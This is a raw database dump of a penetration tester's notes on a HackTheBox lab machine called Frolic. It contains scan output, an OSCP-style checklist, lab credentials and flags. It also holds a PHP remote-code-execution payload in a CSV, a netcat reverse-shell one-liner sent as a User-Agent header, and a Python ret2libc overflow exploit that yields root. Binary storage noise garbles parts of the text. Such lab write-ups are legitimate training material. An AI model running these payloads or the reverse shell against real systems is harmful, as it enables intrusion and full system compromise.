SQLite format 3@ $-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node k '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.11.1.nmap -sC -sV -oA ./frolic 10.10.10.111 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 10:58 EDT #m'  Niktocustom-colors$A?&oA?&]%c'  Web Services <html> <head> <titlk'  UDPcustom-colors$A?&ЍA[?Lm'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.11.1.custom-colorsANl<ɣ H%Hk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2`)U'  Dirb\DirBusterDirBuster 1.0-RC1 - Report http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project Report produced on Thu Apr 02 17:00:47 EDT 2020 --------------------------"n )'  Other Servicescustom-colorsXA[Ad =v)'  Script Resultscustom-colorsXAIZ|xAIs/'  Post Exploitationcustom-colors*AIZnn'%w'  ExploitationService Exploited: Vulnerabs'   OtherPlaySMScustom-colorsA[EϯAס^5?i '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNt%'  ExploitationService Exploited: PlaySMS Vulnerabil! X/]'  Running Processescustom-colorsXAIZ|xAIDžb/c'  Post Exploitationls -la total 36 drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 . drwxr-xr-x 4 root root 4096 Sep 23 2018 .. -rw------- 1 ayush ayush 2781 Sep 25 2018 .bash_history -rw-r--r-- 1 ayush ayush 220 Sep 23 2018 .bash_logout -rw-r--r-- 1 ayush ayush 3771 Sep 23 2018 .bashrc drwxrwxr-x 2 ayush ayush 4096 Sep 25 2018 .binary -rw-r--r-- 1 ayush ayush 655 Sep 23 2018 .profile -rw------- 1 ayush ayush 965 Sep 25 2018 .viminfo -rwxr-xr-x 1 ayush ayush 33 Sep 25 2018 user.txt cd ./.binary www-data@frolic:/home/ayush/.binary$ ls rop<<<<<<<<<<<<<<<<custom-colors*AסNJM OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg m^mOg'  GoodiesService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability /home/ayush/.binary/rop www-data@frolic:/home/ayush/.binary$ ldd rop ldd rop linux-gate.so.1 => (0xb7fda000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000) /lib/ld-linux.so.2 (0xb7fdb000) www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system &#60;/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep)c'  Scheduled JobsScheduled Taskscustom-colors$ANl w/:w@/'  Proof\Flags\OtherUser - 2ab95909cf509f85a6f476b59a0c2fe0 Root - 85d3fdf03f969892538ba9a731826222custom-colors$AסCƨr'  Passwordsif ( username == "admin" && password == "superduperlooperpassword_lol"){ /backup/password.txt gives us "password - imnothuman"; /backup/user.txt gives us "user - admin" http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ eventually gets idkwhatispasscustom-colors$Aסbf'   Hashescustom-colors$A?&&g'  Goodiescustom-colorsVA?& cich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., KK(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xh  ' Log Bookcustom-colors(AI^ X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* system 245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0 627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0 www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit &#60;/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit 112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0  450: 0002edf0 197 FUNC GLOBAL DEFAULT 13 __cxa_thread_atexit_impl@@GLIBC_2.18 558: 000b07c8 24 FUNC GLOBAL DEFAULT 13 _exit@@GLIBC_2.0 616: 00115fa0 56 FUNC GLOBAL DEFAULT 13 svc_exit@@GLIBC_2.0 652: 0002eda0 31 FUNC GLOBAL DEFAULT 13 quick_exit@@GLIBC_2.10 876: 0002ebf0 85 FUNC GLOBAL DEFAULT 13 __cxa_atexit@@GLIBC_2.1.3 1046: 0011fb80 52 FUNC GLOBAL DEFAULT 13 atexit@GLIBC_2.0 1394: 001b2204 4 OBJECT GLOBAL DEFAULT 33 argp_err_exit_status@@GLIBC_2.1  1506: 000f3870 58 FUNC GLOBAL DEFAULT 13 pthread_exit@@GLIBC_2.0 2108: 001b2154 4 OBJECT GLOBAL DEFAULT 33 obstack_exit_failure@@GLIBC_2.0 2263: 0002e9f0 78 FUNC WEAK DEFAULT 13 on_exit@@GLIBC_2.0 2406: 000f4c80 2 FUNC GLOBAL DEFAULT 13 __cyg_profile_func_exit@@GLIBC_2.2  www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep /bin/bash &#60;/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep /bin/bash www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh &#60;/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh 15ba0b /bin/sh libc = 0xb7e19000 system = 0003ada0 exit = 002e9d0 /bin/sh = 15ba0b Exploit Code Used i#!/usr/bin/python import struct def addr(x): return struct.pack("I",x) buf = "A" * 52 libc = 0xb7e19000 shell = addr(libc + 0x0015ba0b) system = addr(libc + 0x0003ada0) exit = addr(libc + 0x0002e9d0) payload = buf + system + exit + shell print (payload) Then run: /home/ayush/.binary/rop $(python /tmp/exploit.py) Root Shell Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAס' e>Crack me :|</title> <!-- Include CSS File Here --> <link rel="stylesheet" href="css/style.css"/> <!-- Include JS File Here --> <script src="js/login.js"></script> </head> <body> <div class="container"> <div class="main"> <h2>c'mon i m hackable</h2> <form id="form_id" method="post" name="myform"> <label>User Name :</label> <input type="text" name="username" id="username"/> <label>Password :</label> <input type="password" name="password" id="password"/> <input type="button" value="Login" id="submit" onclick="validate()"/> </form> <span><b class="note">Note : Nothing</b></span> </div> </div> </body> </html> http://10.10.10.111:9999/admin/js/login.js var attempt = 3; // Variable to count number of attempts. // Below function Executes on click of login button. function validate(){ var username = document.getElementById("username").value; var password = document.getElementById("password").value; if ( username == "admin" && password == "superduperlooperpassword_lol"){ alert ("Login successfully"); window.location = "success.html"; // Redirecting to other page. return false; } else{ attempt --;// Decrementing by one. alert("You have left "+attempt+" attempt;"); // Disabling fields after 3 attempts. if( attempt == 0){ document.getElementById("username").disabled = true; document.getElementById("password").disabled = true; document.getElementById("submit").disabled = true; return false; } } } custom-colors"Aס!Xity Type: RCE Exploit POC: https://www.exploit-db.com/exploits/42044 Description: Upload a malicious CSV for Remote Code Execution Discovery of Vulnerability Dirbuster and manual navigation Exploit Code Used CSV: Name,Mobile,Email,Group code,Tags &#60;?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>,22 User-Agent String: User-Agent: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.XX.XX 1234 >/tmp/f Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,AסdZ------ http://frolic.htb:9999 -------------------------------- Directories found during testing: Dirs found with a 200 response: / /admin/ /test/ /backup/ /dev/backup/ Dirs found with a 403 response: /dev/ /admin/css/ /admin/js/ /loop/ /backup/loop/ /loop/loop/ /backup/loop/loop/ /loop/loop/loop/ /backup/loop/loop/loop/ /loop/loop/loop/loop/ /backup/loop/loop/loop/loop/ /loop/loop/loop/loop/loop/ /backup/loop/loop/loop/loop/loop/ /loop/loop/loop/loop/loop/loop/ /backup/loop/loop/loop/loop/loop/loop/ /loop/loop/loop/loop/loop/loop/loop/ /backup/loop/loop/loop/loop/loop/loop/loop/ /loop/loop/loop/loop/loop/loop/loop/loop/ /backup/loop/loop/loop/loop/loop/loop/loop/loop/ -------------------------------- Files found during testing: Files found with a 200 responce: /test/index.php /admin/js/login.js /backup/index.php /dev/backup/index.php -------------------------------- custom-colors$A?&xAסx$ Nmap scan report for 10.10.10.111 Host is up (0.097s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 9999/tcp open http nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Welcome to nginx! Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -1h49m41s, deviation: 3h10m31s, median: 17s |_nbstat: NetBIOS name: FROLIC, NetBIOS user: &#60;unknown>, NetBIOS MAC: &#60;unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: frolic | NetBIOS computer name: FROLIC\x00 | Domain name: \x00 | FQDN: frolic |_ System time: 2020-04-02T20:29:31+05:30 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-02T14:59:30 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.44 secondscustom-colors$A?&Aס